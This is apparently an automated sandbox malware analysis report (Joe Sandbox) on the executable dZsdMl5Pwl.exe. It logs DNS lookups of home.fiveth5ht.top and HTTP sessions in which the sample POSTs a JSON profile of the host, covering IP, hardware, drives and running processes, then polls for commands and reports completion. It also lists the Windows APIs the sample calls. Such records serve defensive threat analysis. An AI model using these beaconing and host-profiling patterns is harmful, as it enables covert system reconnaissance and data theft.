                                                        Dec 27, 2024 14:54:15.563051939 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563127995 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563206911 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563273907 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563353062 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563476086 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563483000 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563508034 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563546896 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563564062 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563620090 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563623905 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563678026 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563731909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563787937 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563791037 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563842058 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.605627060 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.605679989 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.638092995 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.638159990 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681732893 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.681838036 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.681876898 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.681883097 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681938887 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681962013 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681967974 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682080030 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682180882 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682224035 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682302952 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682367086 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682444096 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682518005 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682575941 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682699919 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682782888 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682853937 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682908058 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682934999 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683079004 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683089972 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683192968 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683202982 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683218956 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683267117 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683332920 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683350086 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683377981 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683408976 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683438063 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683449030 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683486938 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683505058 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683549881 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683562040 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683604956 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683691025 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683702946 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683713913 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683725119 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683743954 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683764935 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683835983 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683845997 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683856964 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683876991 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683940887 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683950901 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684055090 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684066057 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684133053 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684146881 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684204102 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684252977 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684364080 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684375048 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684432983 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684443951 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684525013 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684582949 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684602976 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684631109 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684710026 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684722900 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684815884 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684828997 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684866905 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684911966 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684957981 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684989929 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.685091019 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.725222111 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.757673025 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.757922888 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801467896 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801492929 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801656008 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801676989 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801708937 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801721096 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801786900 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.802207947 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.802297115 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.802846909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.802887917 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803031921 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803057909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803226948 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803369999 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803422928 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803448915 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803581953 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803600073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803692102 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803705931 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803783894 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803813934 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803905964 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803916931 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804011106 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804020882 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804069996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804095030 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804208040 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804227114 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804316998 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804327011 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804411888 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804445028 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804583073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804625988 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804688931 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804698944 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804742098 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804794073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804805040 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804887056 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804897070 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804965019 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804985046 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805063009 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805082083 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805244923 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805263042 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805315018 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805335999 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805514097 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805610895 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805620909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805778980 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805789948 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805799007 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805885077 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805900097 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805941105 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805951118 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805960894 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.806256056 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.806330919 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.921736956 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.921941996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.921956062 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922075033 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922086000 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922152996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922171116 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922286987 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922297955 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922400951 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922410965 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922497988 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922511101 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922606945 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922619104 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922749996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922760010 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922866106 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922883034 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922960997 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922990084 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923031092 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923096895 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923135042 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923165083 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923286915 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923296928 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923393965 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923403978 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923532963 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923549891 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923643112 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923652887 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923691034 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923701048 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923803091 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923814058 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923860073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923870087 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923995018 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924005032 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924115896 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924125910 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924213886 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924222946 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924298048 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924320936 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924407005 CET80497125.101.3.217192.168.2.12
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 14:54:09.899434090 CET | 192.168.2.12 | 1.1.1.1 | 0xde45 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:09.899596930 CET | 192.168.2.12 | 1.1.1.1 | 0x9436 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 27, 2024 14:54:14.100169897 CET | 192.168.2.12 | 1.1.1.1 | 0xa70d | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:14.100292921 CET | 192.168.2.12 | 1.1.1.1 | 0xfe02 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 14:54:18.633910894 CET | 192.168.2.12 | 1.1.1.1 | 0xbdd | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:18.633971930 CET | 192.168.2.12 | 1.1.1.1 | 0x5345 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 14:54:20.387744904 CET | 192.168.2.12 | 1.1.1.1 | 0x4c2d | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:20.387866020 CET | 192.168.2.12 | 1.1.1.1 | 0xfaae | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 14:54:10.038453102 CET | 1.1.1.1 | 192.168.2.12 | 0xde45 | No error (0) | httpbin.org |  | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:10.038453102 CET | 1.1.1.1 | 192.168.2.12 | 0xde45 | No error (0) | httpbin.org |  | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:14.237833023 CET | 1.1.1.1 | 192.168.2.12 | 0xa70d | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:18.770946980 CET | 1.1.1.1 | 192.168.2.12 | 0xbdd | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:54:20.525383949 CET | 1.1.1.1 | 192.168.2.12 | 0x4c2d | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                                        • httpbin.org
                                                        • home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49712 | 5.101.3.217 | 80 | 7104 | C:\Users\user\Desktop\dZsdMl5Pwl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 14:54:14.388747931 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 561895
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8516589909667918211", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe" [TRUNCATED]
                                                        Dec 27, 2024 14:54:18.569953918 CET | 157 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 27 Dec 2024 13:54:18 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Data Raw: 30
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.12 | 49713 | 5.101.3.217 | 80 | 7104 | C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 27, 2024 14:54:18.892043114 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Dec 27, 2024 14:54:20.326376915 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 27 Dec 2024 13:54:20 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 207
                                                        Connection: close
                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.12 | 49714 | 5.101.3.217 | 80 | 7104 | C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 27, 2024 14:54:20.646887064 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                        Data Ascii: { "id1": "0", "data": "Done1" }
                                                        Dec 27, 2024 14:54:22.313235044 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 27 Dec 2024 13:54:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 207
                                                        Connection: close
                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        0 | 192.168.2.12 | 49711 | 34.226.108.155 | 443 | 7104 | C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-27 13:54:11 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
                                                        2024-12-27 13:54:12 UTC | 224 | IN | HTTP/1.1 200 OK
                                                        Date: Fri, 27 Dec 2024 13:54:12 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-12-27 13:54:12 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                        Target ID:0
                                                        Start time:08:54:05
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\dZsdMl5Pwl.exe"
                                                        Imagebase:0x980000
                                                        File size:4'523'520 bytes
                                                        MD5 hash:EFD7BBABA8AA8E6865430D1FFCFBF2D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                          Execution Graph

                                                          Execution Coverage:2.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:15%
                                                          Total number of Nodes:492
                                                          Total number of Limit Nodes:77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: a3f4476e7547c074a06b7cd03b3db7dc3431d64933f0c765f8b37b42895500b4
                                                          • Instruction ID: dc5af10b04215763d3f76ad65aeb6a2bfc4da2e44bc111864bd5ede5078ac92d
                                                          • Opcode Fuzzy Hash: a3f4476e7547c074a06b7cd03b3db7dc3431d64933f0c765f8b37b42895500b4
                                                          • Instruction Fuzzy Hash: D7C2A031A04344DFD714CF28C994BAAB7E5BF84324F05866DEC989B2A2D771ED85CB81

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 00982579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 009825CC
                                                          • GetDriveTypeA.KERNELBASE ref: 00982647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0098267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 009827E2
                                                          • SHGetKnownFolderPath.SHELL32 ref: 0098286D
                                                          • FindFirstFileW.KERNELBASE ref: 009828F8
                                                          • FindNextFileW.KERNELBASE ref: 0098291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
